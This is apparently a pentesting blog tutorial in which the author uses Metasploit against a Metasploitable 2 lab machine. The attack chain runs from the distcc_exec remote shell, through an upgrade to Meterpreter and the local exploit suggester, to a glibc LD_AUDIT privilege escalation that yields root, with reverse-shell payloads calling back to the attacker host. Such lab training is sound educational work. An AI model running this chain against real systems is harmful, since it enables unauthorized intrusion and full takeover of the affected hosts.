How to Get Root with Metasploit's Local Exploit Suggester

Nov 26, 2019 11:00 PM
Nov 27, 2019 05:12 PM
636966135060222002.jpg

So you've managed to get a shell on the target, but you only have measly low-level privileges. Now what? Privilege escalation is a vast field and can be one of the most rewarding yet frustrating phases of an attack. We could go the manual route, but like always, Metasploit makes it easy to perform local privilege escalation and get root with its exploit suggester module.

To run through the process, we're using Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pentesting lab — or the same one — to follow along with the guide below.

Step 1: Get Session on Target

The first thing we need to do is get a session with low privileges on the target. We can easily do this with Metasploit. Type msfconsole in the terminal to launch it.

~$ msfconsole

[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by taking advantage of combined processor power. Unfortunately, this version of the program allows a remote attacker to execute arbitrary commands on the server.

We can search for the exploit using the search command:

msf5 > search distcc

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

To load the module, type use followed by the full path of the module:

msf5 > use exploit/unix/misc/distcc_exec

We can now see the available settings with the options command:

msf5 exploit(unix/misc/distcc_exec) > options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

It looks like we only need to set the remote host address since the remote port is already set using the default port number. Use the set command to specify the appropriate IP address of the target:

msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

Now we are ready to launch the exploit . Use the run command, which is just a shorter alias for exploit:

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 10.10.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can see that a command shell was opened, and running uname -a verifies we have compromised the target.

Step 2: Upgrade to Meterpreter

To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.

Background session 1? [y/N]  y
msf5 exploit(unix/misc/distcc_exec) >

We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)

The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the session number to upgrade:

msf5 exploit(unix/misc/distcc_exec) > sessions -u 1

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.0.1:4433
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
[*] Command stager progress: 100.00% (773/773 bytes)

We can see the post module that runs and a new session is opened. We can again verify this with the sessions command:

msf5 exploit(unix/misc/distcc_exec) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)

And we can interact with our new Meterpreter session using the -i flag on the desired session:

msf5 exploit(unix/misc/distcc_exec) > sessions -i 2

[*] Starting interaction with 2...

meterpreter >

Step 3: Run Exploit Suggester

Metasploit post modules work by running on a background session, not directly in the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. We can then load the local exploit suggester using the following command:

msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester

When we take a look at the options, we only need to specify the session we want to run this on:

msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

Simply set the session to number 2, which is our Meterpreter shell:

msf5 post(multi/recon/local_exploit_suggester) > set session 2

session => 2

And type run to kick it off:

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed

We can see the module checks a number of local exploits and returns a few that seem viable. Awesome.

Step 4: Get Root

The final thing we need to do is use one of these exploits to get root on the system. We'll try the first one that was suggested to us. This exploit takes advantage of a vulnerability in the glibc dynamic linker, in which the LD_AUDIT environmental variable allows loading of a setuid object that ultimately runs with root privileges.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc

Looking at the options, we only need to set the session again — the default executable path will work for now:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options

Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set the session just like before:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2

session => 2

We can also set the payload to give us another Meterpreter session when the exploit completes:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

And set the appropriate listening host (the IP address of our local machine) and port:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1

lhost => 10.10.0.1

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321

lport => 4321

Finally, type run to launch the exploit:

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
[*] Writing '/tmp/.18qZUt' (281 bytes) ...
[*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500

meterpreter >

We now have a new Meterpreter session on the target, and we can drop into a shell to verify we have obtained root access:

meterpreter > shell
Process 4886 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1(daemon)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Wrapping Up

In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade that shell to a Meterpreter session, and use the local exploit suggester module to ultimately get root on the system. Metasploit not only makes initial exploitation easy but the post-exploitation phase as well. In the next article, we will explore some useful post modules to quickly gather information about the target.

Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!